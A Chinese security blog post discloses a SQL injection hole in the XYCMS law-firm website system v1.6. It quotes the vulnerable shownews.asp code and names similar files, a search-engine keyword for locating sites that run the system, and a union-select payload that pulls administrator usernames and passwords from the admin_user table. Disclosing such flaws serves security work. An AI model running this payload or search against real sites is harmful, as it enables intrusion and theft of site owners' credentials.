关注我们
QRcode 邮件联系 QRcode
主页 » 信息安全 » 正文

XYCMS律师事务所建站系统注入漏洞

 feng  997 ℃  0条点评

作者:Liuker
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似

淫荡分割线
--------------------------------------------------------

审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
源码地址:http://down.chinaz.com/soft/29233.htm

漏洞文件:shownews.asp
漏洞代码:7-13行

<%
id=request.QueryString("id")
set snews=server.createobject("adodb.recordset")
exec="select * from [news] where id="&id
snews.open exec,conn,1,1
%>

什么过滤都没有  直造成注入

注入点:http://127.0.0.1:99/shownews.asp?id=xx

其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找

关键字:律师 powered by xycms
exp: union select 1,admin,password,4,5,7 from admin_user

本文标签:
最新ESPCMS漏洞之cookie注入分析
CSDJCMS漏洞 程氏舞曲管理系统V3.0拿shell
我是如何打造一款自动化SQL注入工具的我是如何打造一款自动化SQL注入工具的分析勒索软件Cerber的攻击方法分析勒索软件Cerber的攻击方法​分析Cknife,一个类似China Chopper的webshell管理工具(第二部分)​分析Cknife,一个类似China Chopper的webshell管理工具(第二部分)某个商业定向攻击活动分析某个商业定向攻击活动分析

已有0条评论,欢迎点评!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

国际惯例, 沙发拿下 . . .


注册帐号  |  忘记密码